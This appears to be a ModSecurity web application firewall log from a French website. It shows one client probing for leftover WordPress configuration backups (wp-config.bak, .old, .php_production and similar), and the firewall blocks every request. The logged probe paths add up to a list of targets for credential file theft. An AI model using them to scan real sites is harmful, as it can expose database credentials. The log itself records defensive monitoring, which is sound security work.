[Mon May 11 11:41:16.375573 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:13632] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /wp-config.bak_debug"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.bak_debug"] [unique_id "agGkPBjZymfuKpjWXeh5IQAAANU"]
[Mon May 11 11:41:16.375879 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:13632] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.bak_debug"] [unique_id "agGkPBjZymfuKpjWXeh5IQAAANU"]
[Mon May 11 11:41:17.660631 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:13632] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkPBjZymfuKpjWXeh5IQAAANU"]
[Mon May 11 11:41:17.686177 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:13636] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /wp-config.bak_temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/wp-config.bak_temp"] [unique_id "agGkPRjZymfuKpjWXeh5KQAAAMQ"]
[Mon May 11 11:41:17.686822 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:13636] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/wp-config.bak_temp"] [unique_id "agGkPRjZymfuKpjWXeh5KQAAAMQ"]
[Mon May 11 11:41:18.870757 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:13636] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkPRjZymfuKpjWXeh5KQAAAMQ"]
[Mon May 11 11:41:18.896844 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:13640] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /wp-config.bak_temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.bak_temp"] [unique_id "agGkPr4KNmD_mZ_vlf800QAAAE8"]
[Mon May 11 11:41:18.897384 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:13640] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.bak_temp"] [unique_id "agGkPr4KNmD_mZ_vlf800QAAAE8"]
[Mon May 11 11:41:20.109494 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:13640] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkPr4KNmD_mZ_vlf800QAAAE8"]
[Mon May 11 11:41:20.135212 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:13648] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /wp-config.old.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/wp-config.old.local"] [unique_id "agGkQBjZymfuKpjWXeh5LQAAAMg"]
[Mon May 11 11:41:20.137053 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:13648] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/wp-config.old.local"] [unique_id "agGkQBjZymfuKpjWXeh5LQAAAMg"]
[Mon May 11 11:41:21.315130 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:13648] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkQBjZymfuKpjWXeh5LQAAAMg"]
[Mon May 11 11:41:21.341841 2026] [security2:error] [pid 1256241:tid 1256261] [client 185.177.72.9:13658] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /wp-config.old.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.old.local"] [unique_id "agGkQZkIEwRJMyDaV55LMgAAAU8"]
[Mon May 11 11:41:21.342039 2026] [security2:error] [pid 1256241:tid 1256261] [client 185.177.72.9:13658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.old.local"] [unique_id "agGkQZkIEwRJMyDaV55LMgAAAU8"]
[Mon May 11 11:41:23.566234 2026] [security2:error] [pid 1256241:tid 1256261] [client 185.177.72.9:13658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkQZkIEwRJMyDaV55LMgAAAU8"]
[Mon May 11 11:41:23.594270 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:33202] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/wp-config.php.test"] [unique_id "agGkQ0YQeUtAPynIs6xUrAAAABQ"]
[Mon May 11 11:41:23.597646 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:33202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/wp-config.php.test"] [unique_id "agGkQ0YQeUtAPynIs6xUrAAAABQ"]
[Mon May 11 11:41:24.764059 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:33202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkQ0YQeUtAPynIs6xUrAAAABQ"]
[Mon May 11 11:41:24.791073 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:33214] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.php.test"] [unique_id "agGkRJkIEwRJMyDaV55LNAAAAVI"]
[Mon May 11 11:41:24.791297 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:33214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.php.test"] [unique_id "agGkRJkIEwRJMyDaV55LNAAAAVI"]
[Mon May 11 11:41:26.013870 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:33214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkRJkIEwRJMyDaV55LNAAAAVI"]
[Mon May 11 11:41:26.039435 2026] [security2:error] [pid 1254242:tid 1254265] [client 185.177.72.9:33226] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/wp-config.php_local"] [unique_id "agGkRr4KNmD_mZ_vlf801gAAAFQ"]
[Mon May 11 11:41:26.039639 2026] [security2:error] [pid 1254242:tid 1254265] [client 185.177.72.9:33226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/wp-config.php_local"] [unique_id "agGkRr4KNmD_mZ_vlf801gAAAFQ"]
[Mon May 11 11:41:27.209875 2026] [security2:error] [pid 1254242:tid 1254265] [client 185.177.72.9:33226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkRr4KNmD_mZ_vlf801gAAAFQ"]
[Mon May 11 11:41:27.237008 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:33228] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.php_local"] [unique_id "agGkR0YQeUtAPynIs6xUrwAAABY"]
[Mon May 11 11:41:27.237328 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:33228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.php_local"] [unique_id "agGkR0YQeUtAPynIs6xUrwAAABY"]
[Mon May 11 11:41:28.458555 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:33228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkR0YQeUtAPynIs6xUrwAAABY"]
[Mon May 11 11:41:28.484401 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:33232] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/wp-config.php_old"] [unique_id "agGkSERdw2n9wv6Ai48EXAAAAJU"]
[Mon May 11 11:41:28.484615 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:33232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/wp-config.php_old"] [unique_id "agGkSERdw2n9wv6Ai48EXAAAAJU"]
[Mon May 11 11:41:29.673184 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:33232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkSERdw2n9wv6Ai48EXAAAAJU"]
[Mon May 11 11:41:29.698997 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:33246] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.php_old"] [unique_id "agGkSb4KNmD_mZ_vlf802wAAAEs"]
[Mon May 11 11:41:29.699268 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:33246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.php_old"] [unique_id "agGkSb4KNmD_mZ_vlf802wAAAEs"]
[Mon May 11 11:41:30.933135 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:33246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkSb4KNmD_mZ_vlf802wAAAEs"]
[Mon May 11 11:41:30.960622 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:33248] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/wp-config.php_production"] [unique_id "agGkSmS6k_SCYd1AVZqq-QAAAQY"]
[Mon May 11 11:41:30.961204 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:33248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/wp-config.php_production"] [unique_id "agGkSmS6k_SCYd1AVZqq-QAAAQY"]
[Mon May 11 11:41:32.135194 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:33248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkSmS6k_SCYd1AVZqq-QAAAQY"]
[Mon May 11 11:41:32.155014 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:33264] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.php_production"] [unique_id "agGkTBjZymfuKpjWXeh5NgAAAMU"]
[Mon May 11 11:41:32.155373 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:33264] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.php_production"] [unique_id "agGkTBjZymfuKpjWXeh5NgAAAMU"]
[Mon May 11 11:41:34.398863 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:33264] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkTBjZymfuKpjWXeh5NgAAAMU"]
